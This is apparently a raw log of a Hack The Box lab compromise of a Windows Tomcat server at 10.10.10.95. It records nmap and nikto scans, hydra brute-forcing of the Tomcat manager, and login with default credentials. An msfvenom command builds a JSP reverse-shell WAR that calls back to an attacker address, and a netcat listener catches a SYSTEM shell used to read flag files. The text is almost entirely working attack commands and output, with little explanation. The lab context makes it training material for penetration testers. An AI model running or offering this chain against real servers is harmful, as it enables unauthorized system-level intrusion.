RECON
root@kali:~/htb/reel# nmap -sC -sV -p- -vv -oA  full 10.10.10.95
PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88


hydra -L admin -P /usr/share/wordlists/rockyou.txt -f 10.10.10.95 -s 8080 http-get /manager/html

WEB ENUM
root@kali:~/htb/reel# nikto -h 10.10.10.95:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.95
+ Target Hostname:    10.10.10.95
+ Target Port:        8080
+ Start Time:         2020-11-27 08:31:58 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0xW/21630 0x1525691762000 
+ OSVDB-39272: favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7605 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2020-11-27 08:35:34 (GMT-5) (216 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

ALTERNATIVELY USE HYDRA
root@kali:~/htb/reel# hydra -L /usr/share/wordlists/metasploit/tomcat_mgr_default_users.txt -P /usr/share/wordlists/metasploit/tomcat_mgr_default_pass.txt -f 10.10.10.95 -s 8080 http-get /manager/html
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-11-27 08:56:51
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 42 login tries (l:6/p:0), ~7 tries per task
[DATA] attacking http-get://10.10.10.95:8080//manager/html
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[STATUS] attack finished for 10.10.10.95 (valid pair found)

LOGIN TO TOMCAT WITH DEFAULT CREDENTIALS
http://10.10.10.95:8080/manager/html/
ID 'tomcat', PW 's3cret'

CREATE WAR FILE

Tomcat Version 	JVM Version 	JVM Vendor 	OS Name 	OS Version 	OS Architecture 	Hostname 	IP Address
Apache Tomcat/7.0.88 	1.8.0_171-b11 	Oracle Corporation 	Windows Server 2012 R2 	6.3 	amd64 	JERRY 	10.10.10.95

root@kali:~/htb/reel# msfvenom -a x86_64 --platform windows -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=1234 -f war -o shell.war
Payload size: 1090 bytes
Final size of war file: 1090 bytes
Saved as: shell.war

TRIGGER REVERSE SHELL
http://10.10.10.95:8080/shell/

GET REVERSE SHELL
root@kali:~/htb/reel# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.95: inverse host lookup failed: Unknown host
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users

06/18/2018  10:31 PM    <DIR>          .
06/18/2018  10:31 PM    <DIR>          ..
06/18/2018  10:31 PM    <DIR>          Administrator
08/22/2013  05:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)  27,598,884,864 bytes free

C:\Users>dir Administrators\Desktop\
dir Administrators\Desktop\

C:\Users>dir Administrator\Desktop
dir Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)  27,598,884,864 bytes free

C:\Users>dir Administrator\Desktop\flags
dir Administrator\Desktop\flags
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,598,884,864 bytes free

C:\Users>type 'C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt'
type 'C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt'


GET FLAGS FOR USER AND ROOT
C:\Users>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
#############################

root.txt
#############################

SYSTEMINFO
Host Name:                 JERRY
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00112-46014-AA570
Original Install Date:     6/18/2018, 11:30:45 PM
System Boot Time:          11/27/2020, 6:30:30 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,382 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 4,051 MB
Virtual Memory: In Use:    748 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 142 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894856
                           [05]: KB2903939
                           [06]: KB2911106
                           [07]: KB2919355
                           [08]: KB2919394
                           [09]: KB2928680
                           [10]: KB2938066
                           [11]: KB2954879
                           [12]: KB2967917
                           [13]: KB2977765
                           [14]: KB2978041
                           [15]: KB2978126
                           [16]: KB2989930
                           [17]: KB3000850
                           [18]: KB3003057
                           [19]: KB3004365
                           [20]: KB3004545
                           [21]: KB3012235
                           [22]: KB3012702
                           [23]: KB3013172
                           [24]: KB3013531
                           [25]: KB3013538
                           [26]: KB3013769
                           [27]: KB3013791
                           [28]: KB3013816
                           [29]: KB3014442
                           [30]: KB3015696
                           [31]: KB3018133
                           [32]: KB3019978
                           [33]: KB3021910
                           [34]: KB3023222
                           [35]: KB3023266
                           [36]: KB3024751
                           [37]: KB3024755
                           [38]: KB3029603
                           [39]: KB3030947
                           [40]: KB3032663
                           [41]: KB3033446
                           [42]: KB3035126
                           [43]: KB3036612
                           [44]: KB3037579
                           [45]: KB3037924
                           [46]: KB3038002
                           [47]: KB3042085
                           [48]: KB3044374
                           [49]: KB3044673
                           [50]: KB3045634
                           [51]: KB3045685
                           [52]: KB3045717
                           [53]: KB3045719
                           [54]: KB3045755
                           [55]: KB3045999
                           [56]: KB3046017
                           [57]: KB3046737
                           [58]: KB3054169
                           [59]: KB3054203
                           [60]: KB3054256
                           [61]: KB3054464
                           [62]: KB3055323
                           [63]: KB3055343
                           [64]: KB3055642
                           [65]: KB3059317
                           [66]: KB3060681
                           [67]: KB3060793
                           [68]: KB3061512
                           [69]: KB3063843
                           [70]: KB3071756
                           [71]: KB3074228
                           [72]: KB3074548
                           [73]: KB3076949
                           [74]: KB3077715
                           [75]: KB3078405
                           [76]: KB3078676
                           [77]: KB3080149
                           [78]: KB3082089
                           [79]: KB3084135
                           [80]: KB3084905
                           [81]: KB3086255
                           [82]: KB3087041
                           [83]: KB3087137
                           [84]: KB3091297
                           [85]: KB3094486
                           [86]: KB3095701
                           [87]: KB3097997
                           [88]: KB3098779
                           [89]: KB3099834
                           [90]: KB3100473
                           [91]: KB3102429
                           [92]: KB3103616
                           [93]: KB3103696
                           [94]: KB3103709
                           [95]: KB3109103
                           [96]: KB3109560
                           [97]: KB3109976
                           [98]: KB3110329
                           [99]: KB3115224
                           [100]: KB3121261
                           [101]: KB3121461
                           [102]: KB3123245
                           [103]: KB3126434
                           [104]: KB3126587
                           [105]: KB3133043
                           [106]: KB3133690
                           [107]: KB3134179
                           [108]: KB3134815
                           [109]: KB3137728
                           [110]: KB3138378
                           [111]: KB3138602
                           [112]: KB3138910
                           [113]: KB3138962
                           [114]: KB3139164
                           [115]: KB3139398
                           [116]: KB3139914
                           [117]: KB3140219
                           [118]: KB3140234
                           [119]: KB3145384
                           [120]: KB3145432
                           [121]: KB3146604
                           [122]: KB3146723
                           [123]: KB3146751
                           [124]: KB3147071
                           [125]: KB3155784
                           [126]: KB3156059
                           [127]: KB3159398
                           [128]: KB3161949
                           [129]: KB3162343
                           [130]: KB3172614
                           [131]: KB3172729
                           [132]: KB3173424
                           [133]: KB3175024
                           [134]: KB3178539
                           [135]: KB3179574
                           [136]: KB3185319
                           [137]: KB4033369
                           [138]: KB4033428
                           [139]: KB4054854
                           [140]: KB4096417
                           [141]: KB4287903
                           [142]: KB4284815
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.95
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
